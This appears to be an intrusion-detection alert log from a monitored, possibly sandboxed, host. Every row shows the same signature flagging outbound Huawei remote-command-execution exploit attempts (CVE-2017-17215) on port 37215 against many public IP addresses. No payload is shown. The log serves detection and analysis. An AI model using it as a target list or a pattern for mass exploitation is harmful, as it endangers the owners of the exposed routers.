                                          2024-07-26T17:43:21.924166+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5139437215192.168.2.15161.216.84.102
                                          2024-07-26T17:42:41.860069+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4282637215192.168.2.1541.109.4.1
                                          2024-07-26T17:42:38.375735+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3839237215192.168.2.15157.241.217.201
                                          2024-07-26T17:42:38.337658+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5786237215192.168.2.1541.27.28.243
                                          2024-07-26T17:42:25.234586+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4773837215192.168.2.15206.230.202.67
                                          2024-07-26T17:43:26.508819+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4812237215192.168.2.15157.75.255.109
                                          2024-07-26T17:42:03.752081+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5945437215192.168.2.15197.218.5.147
                                          2024-07-26T17:42:24.327040+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5133837215192.168.2.15106.157.24.127
                                          2024-07-26T17:42:24.317690+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5089437215192.168.2.1541.131.135.94
                                          2024-07-26T17:42:56.988003+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4504837215192.168.2.15157.124.178.141
                                          2024-07-26T17:42:52.053882+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5410237215192.168.2.15157.185.149.12
                                          2024-07-26T17:43:10.503975+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6034237215192.168.2.1541.190.81.16
                                          2024-07-26T17:43:34.473036+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5559237215192.168.2.15128.164.107.88
                                          2024-07-26T17:42:40.528872+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3640837215192.168.2.1541.226.39.89
                                          2024-07-26T17:43:10.556508+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4006037215192.168.2.1541.235.131.144
                                          2024-07-26T17:42:56.991371+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4891837215192.168.2.15157.45.47.161
                                          2024-07-26T17:42:22.977233+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5364637215192.168.2.1524.231.168.41
                                          2024-07-26T17:43:06.795826+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3316237215192.168.2.152.236.218.5
                                          2024-07-26T17:42:23.275321+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4073837215192.168.2.15157.160.227.147
                                          2024-07-26T17:42:26.999031+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3420637215192.168.2.1541.62.11.62
                                          2024-07-26T17:42:40.663101+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5099837215192.168.2.1541.7.101.214
                                          2024-07-26T17:42:30.815346+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5807037215192.168.2.15157.208.221.110
                                          2024-07-26T17:43:04.601850+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4314637215192.168.2.15197.123.99.30
                                          2024-07-26T17:43:22.506796+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5532237215192.168.2.15157.219.221.179
                                          2024-07-26T17:42:22.894237+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3781637215192.168.2.15197.12.225.63
                                          2024-07-26T17:42:56.988812+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4037837215192.168.2.15197.80.16.141
                                          2024-07-26T17:43:32.175998+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4128437215192.168.2.1532.185.12.224
                                          2024-07-26T17:42:24.179275+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5853037215192.168.2.15218.25.22.207
                                          2024-07-26T17:42:22.892910+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3918237215192.168.2.15197.32.97.173
                                          2024-07-26T17:43:32.159241+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3600637215192.168.2.15163.59.165.186
                                          2024-07-26T17:43:06.728070+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3786237215192.168.2.15163.226.97.244
                                          2024-07-26T17:42:24.256725+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5327637215192.168.2.1541.11.38.33
                                          2024-07-26T17:42:45.674969+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4751437215192.168.2.1541.222.23.172
                                          2024-07-26T17:42:30.726500+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4382837215192.168.2.1541.221.102.175
                                          2024-07-26T17:42:23.149205+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4515637215192.168.2.15197.93.55.208
                                          2024-07-26T17:42:38.992663+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5040437215192.168.2.1541.83.92.49
                                          2024-07-26T17:43:32.157918+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3494237215192.168.2.15157.156.195.59
                                          2024-07-26T17:42:31.133457+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4131237215192.168.2.15213.100.5.155
                                          2024-07-26T17:42:38.992660+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4207437215192.168.2.1570.185.26.197
                                          2024-07-26T17:42:03.751876+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3536837215192.168.2.1541.201.17.178
                                          2024-07-26T17:42:22.901005+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5283837215192.168.2.1541.232.167.103
                                          2024-07-26T17:42:03.751875+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4129637215192.168.2.1541.25.241.90
                                          2024-07-26T17:42:24.287043+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4723237215192.168.2.15197.165.27.168
                                          2024-07-26T17:42:37.553275+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5391837215192.168.2.1541.56.4.197
                                          2024-07-26T17:42:22.988543+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4860237215192.168.2.1541.102.255.32
                                          2024-07-26T17:42:24.287214+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4574637215192.168.2.15157.239.10.81
                                          2024-07-26T17:42:33.140380+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4625637215192.168.2.1541.181.193.229
                                          2024-07-26T17:43:00.381794+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4535237215192.168.2.15197.7.225.229
                                          2024-07-26T17:42:24.301117+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3538837215192.168.2.1541.140.107.15
                                          2024-07-26T17:42:22.882411+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4461637215192.168.2.15149.76.30.6
                                          2024-07-26T17:42:24.287856+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4825837215192.168.2.15197.11.115.242
                                          2024-07-26T17:42:58.929134+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5473037215192.168.2.1541.126.69.128
                                          2024-07-26T17:42:22.939719+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3558037215192.168.2.1541.119.153.117
                                          2024-07-26T17:42:22.851199+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5680237215192.168.2.1541.103.19.122
                                          2024-07-26T17:42:23.602210+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4332837215192.168.2.15197.98.34.184
                                          2024-07-26T17:42:54.108108+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5710837215192.168.2.15197.91.19.41
                                          2024-07-26T17:43:27.150044+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3553237215192.168.2.1549.51.195.161
                                          2024-07-26T17:42:24.294250+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4837237215192.168.2.1541.68.254.14
                                          2024-07-26T17:42:24.314164+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5415837215192.168.2.15157.114.119.40
                                          2024-07-26T17:43:00.683809+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4009837215192.168.2.15219.5.156.99
                                          2024-07-26T17:43:02.508884+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6063037215192.168.2.1579.58.175.126
                                          2024-07-26T17:42:23.545202+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5066637215192.168.2.1541.98.163.146
                                          2024-07-26T17:42:24.315912+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4765237215192.168.2.15197.185.42.136
                                          2024-07-26T17:43:12.316377+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4359637215192.168.2.15157.81.229.144
                                          2024-07-26T17:43:24.642635+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5727637215192.168.2.15197.23.152.128
                                          2024-07-26T17:42:22.900619+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5324037215192.168.2.15197.1.219.105
                                          2024-07-26T17:42:38.373747+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5250037215192.168.2.15157.83.67.17
                                          2024-07-26T17:42:52.051589+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5359637215192.168.2.15157.71.129.80
                                          2024-07-26T17:43:19.217704+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5846437215192.168.2.15197.105.62.98
                                          2024-07-26T17:42:24.287386+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5236837215192.168.2.15100.55.79.58
                                          2024-07-26T17:42:03.751962+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3563037215192.168.2.1541.174.85.211
                                          2024-07-26T17:42:30.737301+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4275437215192.168.2.15197.247.185.128
                                          2024-07-26T17:42:40.413453+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5580037215192.168.2.15157.33.31.149
                                          2024-07-26T17:43:22.545985+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4095437215192.168.2.15157.126.151.188
                                          2024-07-26T17:43:06.849990+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4557637215192.168.2.1541.51.125.96
                                          2024-07-26T17:42:03.751791+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4923637215192.168.2.1572.97.140.160
                                          2024-07-26T17:42:38.374387+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5560437215192.168.2.15197.206.248.22
                                          2024-07-26T17:42:46.352590+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4311837215192.168.2.15201.64.179.107
                                          2024-07-26T17:42:03.752001+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5362837215192.168.2.15157.33.225.141
                                          2024-07-26T17:42:23.195595+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5331237215192.168.2.15112.234.47.50
                                          2024-07-26T17:42:35.371539+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4473237215192.168.2.15203.47.62.174
                                          2024-07-26T17:42:40.508501+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3860837215192.168.2.15157.243.168.49
                                          2024-07-26T17:43:04.722046+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3584837215192.168.2.1541.128.66.66
                                          2024-07-26T17:42:23.375667+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4907037215192.168.2.15137.233.56.245
                                          2024-07-26T17:43:10.559828+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5240237215192.168.2.15197.148.102.156
                                          2024-07-26T17:43:06.644205+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3603637215192.168.2.15171.55.129.35
                                          2024-07-26T17:42:22.944107+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4913237215192.168.2.15157.6.72.247
                                          2024-07-26T17:42:23.054845+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4364237215192.168.2.15157.130.223.218
                                          2024-07-26T17:42:22.963256+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5973837215192.168.2.15157.60.145.81
                                          2024-07-26T17:43:26.551133+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4600237215192.168.2.15138.28.99.233
                                          2024-07-26T17:43:32.154781+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5637637215192.168.2.1540.39.152.50
                                          2024-07-26T17:42:24.287467+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3403837215192.168.2.1541.140.89.175
                                          2024-07-26T17:42:24.287595+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3372237215192.168.2.1535.0.100.220
                                          2024-07-26T17:43:32.173820+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3787437215192.168.2.15157.136.190.153
                                          2024-07-26T17:42:33.042697+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3873037215192.168.2.15197.19.17.33
                                          2024-07-26T17:42:51.609064+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5085637215192.168.2.1541.109.14.180
                                          2024-07-26T17:43:32.317143+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5520837215192.168.2.15125.110.221.76
                                          2024-07-26T17:42:52.051458+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4763837215192.168.2.15157.45.159.210
                                          2024-07-26T17:42:23.379714+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3885037215192.168.2.15202.201.192.159
                                          2024-07-26T17:42:56.351153+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5036437215192.168.2.1541.200.103.112
                                          2024-07-26T17:42:23.037958+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5627437215192.168.2.15197.102.130.238
                                          2024-07-26T17:43:32.176089+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4444437215192.168.2.15197.1.136.46
                                          2024-07-26T17:42:56.990706+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4681037215192.168.2.15153.165.94.27
                                          2024-07-26T17:42:24.293059+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4580637215192.168.2.15101.21.16.213
                                          2024-07-26T17:42:24.179292+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3532637215192.168.2.15157.196.46.101
                                          2024-07-26T17:43:10.500954+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4602237215192.168.2.15157.74.205.49
                                          2024-07-26T17:42:47.925389+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6094037215192.168.2.1541.203.142.252
                                          2024-07-26T17:42:54.104305+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3343437215192.168.2.1541.50.8.107
                                          2024-07-26T17:42:24.287042+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5095637215192.168.2.15153.15.187.13
                                          2024-07-26T17:42:22.848943+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4772637215192.168.2.15157.131.83.80
                                          2024-07-26T17:42:22.859475+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3724237215192.168.2.1541.143.15.18
                                          2024-07-26T17:42:24.302989+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4872037215192.168.2.15157.51.89.254
                                          2024-07-26T17:42:52.051416+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4400437215192.168.2.1541.16.27.201
                                          2024-07-26T17:42:03.751831+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3465037215192.168.2.15197.226.205.85
                                          2024-07-26T17:42:37.657528+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5556037215192.168.2.15157.223.221.123
                                          2024-07-26T17:43:04.861870+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4794637215192.168.2.1541.140.32.146
                                          2024-07-26T17:43:22.185652+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3876437215192.168.2.15197.168.72.2
                                          2024-07-26T17:42:27.000927+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5369037215192.168.2.1581.235.78.84
                                          2024-07-26T17:42:56.990919+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3287437215192.168.2.1541.170.149.230
                                          2024-07-26T17:42:32.923596+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4066037215192.168.2.15157.128.239.158
                                          2024-07-26T17:42:32.927145+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4007437215192.168.2.15197.174.15.225
                                          2024-07-26T17:42:40.644350+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4161837215192.168.2.15197.153.251.205
                                          2024-07-26T17:42:22.852003+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4324037215192.168.2.15157.99.99.134
                                          2024-07-26T17:42:03.752052+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5090237215192.168.2.1541.232.108.103
                                          2024-07-26T17:42:44.139346+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5290637215192.168.2.15157.176.96.186
                                          2024-07-26T17:42:56.281857+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4960437215192.168.2.15157.203.95.24
                                          2024-07-26T17:42:24.317186+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6092237215192.168.2.15197.162.249.163
                                          2024-07-26T17:42:30.811966+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3842837215192.168.2.1541.243.165.185
                                          2024-07-26T17:42:22.862975+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5541237215192.168.2.15157.144.55.235
                                          2024-07-26T17:42:24.287646+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5441837215192.168.2.15172.114.80.126
                                          2024-07-26T17:42:22.851193+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3311437215192.168.2.15197.30.1.118
                                          2024-07-26T17:42:54.213653+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3540437215192.168.2.15157.179.166.250
                                          2024-07-26T17:43:24.299160+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3927437215192.168.2.15151.71.194.23
                                          2024-07-26T17:42:32.910259+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3834237215192.168.2.1541.51.180.248
                                          2024-07-26T17:42:03.751966+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5555437215192.168.2.15157.29.11.215
                                          2024-07-26T17:42:22.878195+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4668837215192.168.2.15197.43.30.179
                                          2024-07-26T17:43:06.796928+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5244437215192.168.2.15197.5.58.57
                                          2024-07-26T17:42:24.803531+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5248037215192.168.2.1586.12.52.246
                                          2024-07-26T17:42:38.562210+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3530237215192.168.2.1541.47.63.84
                                          2024-07-26T17:42:22.960183+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5015437215192.168.2.1541.116.64.233
                                          2024-07-26T17:42:44.230369+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4127637215192.168.2.15157.253.227.205
                                          2024-07-26T17:42:52.054187+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4239837215192.168.2.15197.120.137.83
                                          2024-07-26T17:42:24.312752+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4342437215192.168.2.1549.29.129.149
                                          2024-07-26T17:43:10.556330+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5020637215192.168.2.15157.232.155.118
                                          2024-07-26T17:42:03.752053+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4498637215192.168.2.15197.190.102.105
                                          2024-07-26T17:42:24.312496+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5252637215192.168.2.15197.214.37.126
                                          2024-07-26T17:42:03.752096+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4980637215192.168.2.15197.106.7.159
                                          2024-07-26T17:42:22.936645+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3947037215192.168.2.15157.94.112.33
                                          2024-07-26T17:42:22.956258+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5773637215192.168.2.15157.10.215.35
                                          2024-07-26T17:42:32.907393+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4256837215192.168.2.1541.134.183.139
                                          2024-07-26T17:43:24.648575+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5333637215192.168.2.1541.150.27.214
                                          2024-07-26T17:42:30.889178+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3295637215192.168.2.15157.195.53.49
                                          2024-07-26T17:42:54.209938+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3476837215192.168.2.15197.236.80.139
                                          2024-07-26T17:43:26.448365+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5576237215192.168.2.15157.85.199.246
                                          2024-07-26T17:42:24.287647+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4369237215192.168.2.1541.164.74.42
                                          2024-07-26T17:42:38.401724+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4127837215192.168.2.1541.198.44.15
                                          2024-07-26T17:42:03.751839+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5285637215192.168.2.15197.52.17.31
                                          2024-07-26T17:42:42.040798+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5040637215192.168.2.15197.13.86.225
                                          2024-07-26T17:43:12.180616+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4522437215192.168.2.15145.129.134.173
                                          2024-07-26T17:42:03.663396+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5791037215192.168.2.15197.6.116.163
                                          2024-07-26T17:42:23.590390+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5765437215192.168.2.1541.73.141.211
                                          2024-07-26T17:42:24.211094+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3760237215192.168.2.15219.209.44.35
                                          2024-07-26T17:42:24.304444+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4754637215192.168.2.15123.29.130.155
                                          2024-07-26T17:42:31.050536+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3682237215192.168.2.1587.217.154.96
                                          2024-07-26T17:42:23.661945+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3918037215192.168.2.1541.58.129.177
                                          2024-07-26T17:42:03.751964+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4803637215192.168.2.15197.73.62.49
                                          2024-07-26T17:42:40.395421+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4416037215192.168.2.15157.52.30.157
                                          2024-07-26T17:43:24.816955+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3845037215192.168.2.1541.124.217.212
                                          2024-07-26T17:42:44.373737+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5290637215192.168.2.15157.140.239.75
                                          2024-07-26T17:42:22.851190+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4070037215192.168.2.15157.53.239.53
                                          2024-07-26T17:43:22.215537+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4374437215192.168.2.159.66.190.137
                                          2024-07-26T17:42:56.991979+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4420837215192.168.2.15157.118.168.225
                                          2024-07-26T17:43:13.057413+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3887237215192.168.2.15197.80.244.131
                                          2024-07-26T17:42:22.882933+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3685837215192.168.2.15197.112.4.97
